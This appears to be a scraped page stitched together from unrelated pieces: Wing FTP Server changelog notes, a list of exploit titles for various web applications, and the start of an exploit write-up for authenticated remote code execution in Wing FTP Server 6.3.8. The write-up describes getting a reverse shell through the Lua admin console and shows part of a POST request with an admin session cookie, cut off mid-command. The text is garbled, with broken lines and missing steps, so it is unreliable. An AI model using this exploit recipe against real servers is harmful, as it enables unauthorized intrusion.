


Improvement - During installation on Windows Server Core, you will be asked to start WingFTP service instead of tray application.
Fixed a bug - When editing a user, pressing Tab to the password field will hide the new password.
Fixed a bug - The WingFTP service will crash when testing ODBC with a wrong ODBC source.

Wing FTP Server v7.2.1 Released: 6/May/2023

"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile"
"ChurchCRM 4.2.0 - CSV/Formula Injection"
"DotCMS 20.11 - Stored Cross-Site Scripting"

No rate Limit on Password Reset functionality"
"Ksix Zigbee Devices - Playback Protection Bypass (PoC)"
"ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)"
"NewsLister - Authenticated Persistent Cross-Site Scripting"
"aSc TimeTables 2021.6.2 - Denial of Service (PoC)"
"Mitel mitel-cs018 - Call Data Information Disclosure"

# Exploit Title: Wing FTP Server 6.3.8 - Remote Code Execution (Authenticated)
# Date:
# Exploit Author: v1n1v131r4
# Vendor Homepage:
# Software Link:
# Version: 6.3.8
# Tested on: Windows 10
# CVE : -

Wing FTP Server has a web console based on the Lua language. For authenticated users, this console can be exploited to obtain a reverse shell.

msfvenom)
2) Send and execute via POST

POST /admin_lua_.
html
Content-Type: text/plain; charset=UTF-8
Content-Length: 153
Connection: close
Cookie: admin_lang=english; admin_login_name=admin; UIDADMIN=75e5058fb61a81e427ae86f55794f1f5

command=os.
